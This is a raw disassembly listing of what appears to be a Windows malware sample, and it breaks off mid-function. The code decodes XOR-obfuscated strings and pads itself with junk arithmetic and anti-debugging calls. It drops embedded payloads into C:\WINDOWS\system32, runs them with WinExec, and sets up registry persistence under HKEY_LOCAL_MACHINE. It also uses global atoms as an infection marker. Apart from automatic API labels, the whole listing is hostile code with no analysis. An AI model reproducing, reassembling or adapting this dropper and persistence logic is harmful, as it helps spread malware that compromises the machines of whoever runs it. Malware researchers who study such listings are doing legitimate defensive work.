lea esi, aR6 ; "R6"
mov ecx, 3
rep movsb
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_105]
push eax
push [ebp+arg_0]
call sub_403383
call sub_40C598 ; GetTickCount
push 2
push offset word_446666
call sub_4032E7
push eax
lea edi, [ebp+var_105]
push edi
call sub_40CA54
add esp, 18h
mov [ebp+var_108], 1D40h
add [ebp+var_108], 6FD4h
loc_403545: ; CODE XREF: sub_4034D8+9E�j
lea eax, [ebp+var_105]
push eax
call sub_40C5EC ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_10A], di
cmp [ebp+var_10A], 0
jz short loc_403578
movzx eax, [ebp+var_10A]
push eax
call sub_40C5E0 ; GlobalDeleteAtom
call sub_40C598 ; GetTickCount
jmp short loc_403545
; ---------------------------------------------------------------------------
loc_403578: ; CODE XREF: sub_4034D8+8A�j
pop edi
pop esi
leave
retn
sub_4034D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_403610+A1�p
; sub_4036F2+37�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 1D8h
push esi
push [ebp+arg_0]
mov eax, dword_43C17C
lea eax, ds:40E110h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4035C1
; ---------------------------------------------------------------------------
loc_4035AA: ; CODE XREF: sub_40357C+47�j
mov eax, dword_43C17C
add eax, edi
lea eax, ds:40E110h[eax]
movsx edx, byte ptr [eax]
xor edx, 4Eh
mov [eax], dl
inc edi
loc_4035C1: ; CODE XREF: sub_40357C+2C�j
cmp edi, esi
jl short loc_4035AA
mov [ebp+var_8], 1C3h
mov eax, dword_43C17C
add eax, esi
mov byte ptr ds:dword_40E110[eax], 0
mov edi, dword_43C17C
mov eax, edi
add eax, 2
add eax, esi
mov dword_43C17C, eax
inc dword_43C17C
cmp dword_43C17C, 0E02h
jle short loc_403606
and dword_43C17C, 0
loc_403606: ; CODE XREF: sub_40357C+81�j
lea eax, dword_40E110[edi]
pop edi
pop esi
leave
retn
sub_40357C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403610 proc near ; CODE XREF: sub_4036F2+44�p
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_38], 579Dh
add [ebp+var_38], 917h
mov ax, word_43C180
mov [ebp+var_3A], ax
mov esi, 2C6Bh
mov eax, esi
add eax, esi
mov esi, eax
mov eax, 0Dh
sub eax, dword_43C178
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40C9A0
add esp, 0Ch
call sub_40C514 ; GetCurrentThreadId
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_403663: ; CODE XREF: sub_403610+58�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403663
mov ebx, eax
mov [ebp+var_2], bl
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_1], 0
jmp short loc_403690
; ---------------------------------------------------------------------------
loc_40367A: ; CODE XREF: sub_403610+8A�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_403690: ; CODE XREF: sub_403610+68�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_40367A
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_4036C4
; ---------------------------------------------------------------------------
loc_4036AA: ; CODE XREF: sub_403610+C5�j
push 1
push offset byte_446664
call sub_40357C
push eax
push edi
call sub_40CA54
add esp, 10h
add [ebp+var_3], 1
loc_4036C4: ; CODE XREF: sub_403610+98�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_4036AA
call sub_40C5A4 ; GetVersion
push [ebp+arg_8]
push edi
call sub_40CA54
add esp, 8
call sub_40C538 ; RtlGetLastWin32Error
pop edi
pop esi
pop ebx
leave
retn
sub_403610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036F2 proc near ; CODE XREF: sub_40A766+671�p
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
lea edi, [ebp+var_35]
lea esi, word_43C182
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_2], 891h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push 1
push offset word_446662
call sub_40357C
push eax
lea edi, [ebp+var_34]
push edi
push [ebp+arg_0]
call sub_403610
add esp, 14h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_34]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov ebx, 3324h
sub ebx, 3885h
pop edi
pop esi
pop ebx
leave
retn
sub_4036F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40375C proc near ; CODE XREF: sub_4037EF+47�p
; .text:004038C7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 6Ch
push esi
push [ebp+arg_0]
mov eax, dword_43C18C
lea eax, ds:40F780h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4037A1
; ---------------------------------------------------------------------------
loc_40378A: ; CODE XREF: sub_40375C+47�j
mov eax, dword_43C18C
add eax, edi
lea eax, ds:40F780h[eax]
movsx edx, byte ptr [eax]
xor edx, 7
mov [eax], dl
inc edi
loc_4037A1: ; CODE XREF: sub_40375C+2C�j
cmp edi, esi
jl short loc_40378A
mov eax, dword_43C18C
add eax, esi
mov byte ptr ds:dword_40F780[eax], 0
xor edi, edi
mov edi, dword_43C18C
inc dword_43C18C
mov eax, dword_43C18C
lea eax, [eax+esi+6]
mov dword_43C18C, eax
cmp eax, 0DE8h
jle short loc_4037DE
and dword_43C18C, 0
loc_4037DE: ; CODE XREF: sub_40375C+79�j
mov [ebp+var_8], 0FFh
lea eax, dword_40F780[edi]
pop edi
pop esi
leave
retn
sub_40375C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037EF proc near ; CODE XREF: sub_40A766+719�p
; sub_40A766+74F�p
var_10A = word ptr -10Ah
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_108]
lea esi, byte_43C190
mov ecx, 3
rep movsb
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40CA30
mov ax, word_43C193
mov [ebp+var_10A], ax
push 1
push offset asc_446660 ; "$"
call sub_40375C
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
mov ebx, 20A5h
sub ebx, 7EDBh
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40CA54
add esp, 20h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_104]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov [ebp+var_105], 4Eh
add [ebp+var_105], 55h
pop edi
pop esi
pop ebx
leave
retn
sub_4037EF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
call sub_40C574 ; GetProcessHeap
lea edi, [ebp-10Bh]
lea esi, aH8me ; "H8mE"
mov ecx, 5
rep movsb
call sub_40C598 ; GetTickCount
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40CA30
push 1
push offset asc_446660 ; "$"
call sub_40375C
push eax
lea edi, [ebp-104h]
push edi
call sub_40CA54
call sub_40C634 ; IsDebuggerPresent
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40CA54
add esp, 20h
call sub_40C5A4 ; GetVersion
loc_4038F5: ; CODE XREF: .text:00403930�j
lea eax, [ebp-104h]
push eax
call sub_40C5EC ; GlobalFindAtomA
mov edi, eax
mov [ebp-106h], di
call sub_40C514 ; GetCurrentThreadId
cmp word ptr [ebp-106h], 0
jz short loc_403932
call sub_40C508 ; GetCurrentProcessId
movzx eax, word ptr [ebp-106h]
push eax
call sub_40C5E0 ; GlobalDeleteAtom
call sub_40C514 ; GetCurrentThreadId
jmp short loc_4038F5
; ---------------------------------------------------------------------------
loc_403932: ; CODE XREF: .text:00403917�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403936 proc near ; CODE XREF: sub_4039D6+8B�p
; sub_403AA3+73�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 20Eh
push esi
push [ebp+arg_0]
mov eax, dword_43C1A4
lea eax, ds:41DA90h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_8], 331h
xor edi, edi
jmp short loc_403985
; ---------------------------------------------------------------------------
loc_40396B: ; CODE XREF: sub_403936+51�j
mov eax, dword_43C1A4
add eax, edi
lea eax, ds:41DA90h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Fh
mov [eax], dl
inc edi
loc_403985: ; CODE XREF: sub_403936+33�j
cmp edi, esi
jl short loc_40396B
mov eax, dword_43C1A4
add eax, esi
mov byte ptr ds:dword_41DA90[eax], 0
mov edi, dword_43C1A4
inc dword_43C1A4
mov eax, dword_43C1A4
lea eax, [eax+esi+6]
mov dword_43C1A4, eax
add dword_43C1A4, 2
cmp dword_43C1A4, 0DFDh
jle short loc_4039CC
and dword_43C1A4, 0
loc_4039CC: ; CODE XREF: sub_403936+8D�j
lea eax, dword_41DA90[edi]
pop edi
pop esi
leave
retn
sub_403936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D6 proc near ; CODE XREF: sub_403AA3+49�p
; sub_403C5F+155�p ...
var_1013 = byte ptr -1013h
var_100B = byte ptr -100Bh
var_1008 = dword ptr -1008h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1014h
call sub_40C498
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_100B]
lea esi, word_4411CA
mov ecx, 3
rep movsb
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1008]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C5BC ; GetVolumeInformationA
lea edi, [ebp+var_1013]
lea esi, aK0iJ ; " K0i=J "
movsd
movsd
push 4
push offset aK ; ""
call sub_403936
push [ebp+var_1008]
push eax
push ebx
call sub_40CA30
add esp, 14h
and [ebp+var_4], 0
loc_403A7A: ; CODE XREF: sub_4039D6+C1�j
mov eax, [ebp+var_4]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403A90
cmp al, 30h
jle short loc_403A90
mov eax, [ebp+var_4]
add eax, ebx
add byte ptr [eax], 11h
loc_403A90: ; CODE XREF: sub_4039D6+AC�j
; sub_4039D6+B0�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403A7A
call sub_40C5A4 ; GetVersion
pop edi
pop esi
pop ebx
leave
retn
sub_4039D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AA3 proc near ; CODE XREF: sub_40A766+7E8�p
var_290 = dword ptr -290h
var_28A = byte ptr -28Ah
var_283 = byte ptr -283h
var_280 = byte ptr -280h
var_27C = dword ptr -27Ch
var_278 = byte ptr -278h
var_275 = byte ptr -275h
var_26F = byte ptr -26Fh
var_16B = byte ptr -16Bh
var_107 = byte ptr -107h
var_106 = word ptr -106h
var_104 = word ptr -104h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 290h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_275]
lea esi, aKg7x_ ; "kg7x_"
mov ecx, 3
rep movsw
mov [ebp+var_104], 63FCh
movzx eax, [ebp+var_104]
imul eax, 3246h
mov [ebp+var_104], ax
lea eax, [ebp+var_16B]
push eax
call sub_4039D6
lea edi, [ebp+var_278]
lea esi, aOw ; "oW"
mov ecx, 3
rep movsb
mov eax, dword_4411DE
mov [ebp+var_27C], eax
push 9
push offset byte_446651
call sub_403936
lea edi, [ebp+var_16B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
mov ebx, 3DFBh
mov eax, 1040h
mul ebx
mov [ebp+var_290], eax
mov ebx, eax
lea eax, [ebp+var_FF]
push eax
call sub_403449
mov [ebp+var_102], 0F5Dh
movzx eax, [ebp+var_102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_102], ax
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_106], 10FCh
add [ebp+var_106], 4EDCh
push 0
lea eax, [ebp+var_280]
push eax
push 3621h
push offset byte_43DBA9
push ebx
call sub_40C730 ; WriteFile
push ebx
call sub_40C55C ; CloseHandle
mov ebx, 0CDFh
add ebx, 10D0h
lea edi, [ebp+var_283]
lea esi, word_4411E2
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_26F]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
push 1
push offset byte_44664F
call sub_403936
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
lea edi, [ebp+var_28A]
lea esi, aVR ; "|+V|;R"
mov ecx, 7
rep movsb
lea eax, [ebp+var_26F]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40CA54
add esp, 38h
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40C724 ; WinExec
mov [ebp+var_107], 0F3h
movzx eax, [ebp+var_107]
imul eax, 6754h
mov [ebp+var_107], al
pop edi
pop esi
pop ebx
leave
retn
sub_403AA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C5F proc near ; CODE XREF: sub_40A766+2E7�p
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_2FF = byte ptr -2FFh
var_2FC = byte ptr -2FCh
var_2F5 = byte ptr -2F5h
var_2F4 = byte ptr -2F4h
var_2F1 = byte ptr -2F1h
var_2E9 = byte ptr -2E9h
var_2E3 = byte ptr -2E3h
var_2DE = byte ptr -2DEh
var_278 = dword ptr -278h
var_271 = byte ptr -271h
var_270 = dword ptr -270h
var_26C = word ptr -26Ch
var_26A = byte ptr -26Ah
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 328h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
lea edi, [ebp+var_2E3]
lea esi, aN4U ; "N4/u"
mov ecx, 5
rep movsb
mov [ebp+var_26A], 0C4h
movzx eax, [ebp+var_26A]
imul eax, 0CACh
mov [ebp+var_26A], al
push 26h
push offset dword_446628
call sub_403936
mov [ebp+var_304], eax
call sub_40CA18
mov [ebp+var_308], eax
call sub_40CA18
mov [ebp+var_30C], eax
call sub_40CA18
mov [ebp+var_310], eax
call sub_40CA18
mov [ebp+var_314], eax
call sub_40CA18
mov [ebp+var_318], eax
call sub_40CA18
mov [ebp+var_31C], eax
call sub_40CA18
mov [ebp+var_320], eax
call sub_40CA18
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_320]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_31C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_318]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_314]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
push edi
lea edi, [ebp+var_269]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_2E9]
lea esi, aVEM ; "v e~m"
mov ecx, 3
rep movsw
lea eax, [ebp+var_2DE]
push eax
call sub_4039D6
add esp, 34h
mov ebx, 3F4Bh
sub ebx, 721Bh
lea edi, [ebp+var_2F1]
lea esi, aKPyesn ; "k&PYESN"
mov ecx, 2
rep movsd
call sub_40CA18
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
lea edi, [ebp+var_2F4]
lea esi, aAj ; "aJ"
mov ecx, 3
rep movsb
mov [ebp+var_1], 1
jmp short loc_403E4A
; ---------------------------------------------------------------------------
loc_403E1A: ; CODE XREF: sub_403C5F+1F0�j
call sub_40CA18
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403E4A: ; CODE XREF: sub_403C5F+1B9�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403E1A
mov [ebp+var_26C], 789Fh
movzx eax, [ebp+var_26C]
imul eax, 7E80h
mov [ebp+var_26C], ax
mov [ebp+var_F9], 0
call sub_40CA18
mov edx, eax
test dl, 1
jnz short loc_403EA8
call sub_40C574 ; GetProcessHeap
mov [ebp+var_FB], 33h
mov [ebp+var_324], 1F1Ah
add [ebp+var_324], 4A03h
mov [ebp+var_FA], 32h
loc_403EA8: ; CODE XREF: sub_403C5F+220�j
push 9
push offset word_44661E
call sub_403936
lea edi, [ebp+var_101]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_205]
push edi
call sub_40CA30
lea edi, [ebp+var_2F5]
lea esi, byte_441202
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_205]
push eax
call sub_403449
call sub_40C514 ; GetCurrentThreadId
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_270], 1D0Fh
inc [ebp+var_270]
push [ebp+arg_0]
mov eax, offset aJembijfp ; "Jembijfp"
push eax
call sub_40CA30
push 0
lea eax, [ebp+var_2FC]
push eax
push 1A01h
push offset dword_43C1A8
push ebx
call sub_40C730 ; WriteFile
lea edi, [ebp+var_2FF]
lea esi, byte_441203
mov ecx, 3
rep movsb
push ebx
call sub_40C55C ; CloseHandle
call sub_40C634 ; IsDebuggerPresent
push 17h
push offset word_446606
call sub_403936
lea edi, [ebp+var_269]
push edi
push eax
lea edi, [ebp+var_101]
push edi
call sub_40CA30
mov [ebp+var_271], 81h
add [ebp+var_271], 1
lea eax, [ebp+var_205]
push eax
push offset byte_446605
lea eax, [ebp+var_101]
push eax
push 80000000h
call sub_40404B
mov [ebp+var_278], 2820h
mov eax, 260Ch
mul [ebp+var_278]
mov [ebp+var_324], eax
mov [ebp+var_278], eax
push 0Eh
push offset word_4465F6
call sub_403936
mov [ebp+var_328], eax
push 9
push offset dword_4465EC
call sub_403936
push eax
mov edi, [ebp+var_328]
push edi
lea edi, [ebp+var_101]
push edi
push 80000000h
call sub_40404B
call sub_40C598 ; GetTickCount
push 45h
push offset word_4465A6
loc_404010: ; DATA XREF: .data:0043E139�w
; .data:0043E153�w ...
call sub_403936
lea edi, [ebp+var_269]
push edi
sub_403C5F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40401C proc near ; DATA XREF: .data:0043E1CD�o
; .data:0043E21C�r
lea edi, [ebp-2DEh]
push edi
push eax
sub_40401C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404024 proc near ; DATA XREF: .data:0043E201�o
; .data:0043E216�r ...
push 80000002h
call sub_40404B ; DATA XREF: .data:loc_43E1A1�r
; .data:loc_43E1B1�r
add esp, 80h ; DATA XREF: .data:0043E0A5�w
loc_404034: ; DATA XREF: .data:0043E0AF�w
; .data:0043E0CA�r ...
mov word ptr [ebp-27Ah], 2967h
sub word ptr [ebp-27Ah], 716Eh
pop edi
pop esi
pop ebx
leave
retn
sub_404024 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40404B proc near ; CODE XREF: sub_403C5F+348�p
; sub_403C5F+3A0�p ...
var_17 = byte ptr -17h
var_F = byte ptr -0Fh
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_6], 396Fh
sub [ebp+var_6], 2933h
inc dword_43B228
lea edi, [ebp+var_F]
lea esi, word_441206
mov ecx, 3
rep movsb
lea edi, [ebp+var_17]
lea esi, aUs6arh ; " US6rH"
movsd
movsd
and [ebp+var_4], 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
loc_40408C: ; DATA XREF: .data:0043E054�w
push eax
push 0
push 0F003Fh ; DATA XREF: .data:0043E059�w
; .data:0043E075�w
loc_404094: ; DATA XREF: .data:0043E5B4�w
; .data:0043E5BA�r ...
push 0
push 0
sub_40404B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404098 proc near ; DATA XREF: .data:loc_43E4BD�o
; .data:0043E519�o ...
push 0
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40C91C ; RegCreateKeyExA
call sub_40C5A4 ; GetVersion
sub_404098 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040AA proc near ; DATA XREF: sub_43E630+C�o
mov eax, [ebp+14h]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4040B2: ; CODE XREF: sub_4040AA+D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4040B2
mov [ebp-0Ch], eax ; DATA XREF: sub_43E630+1C�o
call sub_40C634 ; IsDebuggerPresent
push dword ptr [ebp-0Ch]
push dword ptr [ebp+14h]
push 1
push 0
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call sub_40C94C ; RegSetValueExA
call sub_40C574 ; GetProcessHeap
push dword ptr [ebp-4]
call sub_40C928 ; RegCloseKey
mov ebx, 4DD8h
mov eax, 4D1Ah
mul ebx
mov [ebp-1Ch], eax
mov eax, [ebp-1Ch]
mov ebx, eax
pop edi
pop esi
pop ebx
leave
retn
sub_4040AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040FC proc near ; CODE XREF: sub_404194+FE�p
; sub_404194+11E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_44121C
lea eax, ds:411DB0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404122: ; CODE XREF: sub_4040FC+42�j
mov eax, dword_44121C
add eax, edi
lea eax, ds:411DB0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ADh
mov [eax], dl
inc edi
loc_40413C: ; CODE XREF: sub_4040FC+24�j
cmp edi, esi
jl short loc_404122
mov [ebp+var_4], 1A7h
mov eax, dword_44121C
add eax, esi
mov byte ptr ds:dword_411DB0[eax], 0
mov edi, dword_44121C
add dword_44121C, 2
mov eax, dword_44121C
lea eax, [eax+esi+2]
mov dword_44121C, eax
inc dword_44121C
cmp dword_44121C, 0DB6h
jle short loc_40418A
and dword_44121C, 0
loc_40418A: ; CODE XREF: sub_4040FC+85�j
lea eax, dword_411DB0[edi]
pop edi
pop esi
leave
retn
sub_4040FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404194 proc near ; CODE XREF: sub_40A766+33D�p
var_14BA = byte ptr -14BAh
var_14B3 = byte ptr -14B3h
var_14B2 = byte ptr -14B2h
var_14AC = byte ptr -14ACh
var_14A7 = byte ptr -14A7h
var_14A4 = byte ptr -14A4h
var_149C = byte ptr -149Ch
var_1499 = byte ptr -1499h
var_1496 = byte ptr -1496h
var_1397 = byte ptr -1397h
var_1396 = byte ptr -1396h
var_1395 = byte ptr -1395h
var_1394 = dword ptr -1394h
var_1384 = dword ptr -1384h
var_1300 = byte ptr -1300h
var_1201 = byte ptr -1201h
var_1102 = word ptr -1102h
var_10FF = byte ptr -10FFh
var_10FE = byte ptr -10FEh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14BCh
call sub_40C498
push ebx
push esi
push edi
mov [ebp+var_10FF], 5Ah
movzx eax, [ebp+var_10FF]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_10FF], al
lea edi, [ebp+var_1499]
lea esi, byte_441220
mov ecx, 3
rep movsb
lea edi, [ebp+var_149C]
lea esi, byte_441223
mov ecx, 3
rep movsb
push 0FFh
lea eax, [ebp+var_1300]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
mov ebx, 2910h
inc ebx
mov [ebp+var_1394], 94h
mov [ebp+var_1102], 6834h
movzx eax, [ebp+var_1102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1102], ax
lea eax, [ebp+var_1394]
push eax
call sub_40C5B0 ; GetVersionExA
mov [ebp+var_1395], 0B9h
add [ebp+var_1395], 1
lea edi, [ebp+var_14A4]
lea esi, aNb_ya ; "%&nb.ya"
movsd
movsd
cmp [ebp+var_1384], 2
jnz loc_4042E9
mov [ebp+var_14B3], 0DCh
add [ebp+var_14B3], 90h
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C580 ; GetSystemDirectoryA
lea edi, [ebp+var_14BA]
lea esi, a@p ; " $~@p"
mov ecx, 7
rep movsb
push 0Fh
push offset word_446596
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1201]
push edi
call sub_40CA30
push 0Ah
push offset byte_44658B
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1496]
push edi
call sub_40CA30
push 8
push offset word_446582
call sub_4040FC
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
add esp, 38h
jmp short loc_404365
; ---------------------------------------------------------------------------
loc_4042E9: ; CODE XREF: sub_404194+BF�j
call sub_40C574 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C5C8 ; GetWindowsDirectoryA
call sub_40C598 ; GetTickCount
push 0Fh
push offset word_446572
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1201]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
push 0Eh
push offset byte_446563
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1496]
push edi
call sub_40CA30
push 0Ch
push offset word_446556
call sub_4040FC
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
add esp, 38h
loc_404365: ; CODE XREF: sub_404194+153�j
lea eax, [ebp+var_1496]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C598 ; GetTickCount
lea edi, [ebp+var_14A7]
lea esi, aP ; " p"
mov ecx, 3
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_1201]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
lea edi, [ebp+var_14B2]
lea esi, aVk_0 ; " vK%;"
mov ecx, 3
rep movsw
push 39h
push offset aCAzaNiUAzaNNiN ; "ݠޓˍٍލ"...
call sub_4040FC
lea edi, [ebp+var_1201]
push edi
lea edi, [ebp+var_1300]
push edi
